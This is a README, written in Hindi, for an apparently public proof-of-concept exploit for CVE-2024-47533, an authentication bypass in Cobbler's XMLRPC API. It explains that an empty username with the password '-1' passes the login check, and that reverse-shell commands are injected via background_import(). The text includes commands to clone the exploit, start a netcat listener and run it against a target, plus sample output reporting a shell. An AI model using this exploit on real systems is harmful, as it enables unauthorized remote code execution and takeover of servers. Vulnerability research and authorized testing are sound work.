
CVE-2024-47533 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो कॉबलर के XMLRPC API में प्रमाणीकरण बाईपास है, जो अप्रमाणित रिमोट कोड निष्पादन और रिवर्स शेल की ओर ले जाता है।
यह रिपॉजिटरी CVE-2024-47533 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है,
जो कोबलर के XMLRPC API में एक महत्वपूर्ण प्रमाणीकरण बायपास है, जो अनप्रमाणित रिमोट कोड निष्पादन (RCE) की ओर ले जाता है।
यह एक्सप्लॉइट प्रमाणीकरण को बायपास करने और background_import() के माध्यम से रिवर्स शेल कमांड इंजेक्ट करने के लिए XMLRPC API की login() विधि में दोष का लाभ उठाता है।
यह उपकरण केवल शैक्षिक, अनुसंधान और अधिकृत पैठ परीक्षण के लिए है।
इसे उन सिस्टम पर उपयोग न करें जिनके स्वामी नहीं हैं या जिनके परीक्षण के लिए स्पष्ट लिखित अनुमति नहीं है।
लेखक दुरुपयोग या हानि के लिए कोई देयता नहीं मानता।
मूल कारण:
utils.get_shared_secret() एन्कोडिंग के साथ बाइनरी मोड में फ़ाइल रीड को गलत तरीके से संभालने के कारण गलत तरीके से -1 लौटाता है, जिससे खाली उपयोगकर्ता नाम और -1 को पासवर्ड के रूप में प्रमाणीकरण की अनुमति मिलती है।
प्रभाव:
एक हमलावर यह कर सकता है:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
अपने हमला करने वाली मशीन पर:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
उदाहरण:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # रिवर्स शेल एक्सप्लॉइट स्क्रिप्ट
└── README.md # दस्तावेज़ीकरण
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
GitHub प्रोफ़ाइल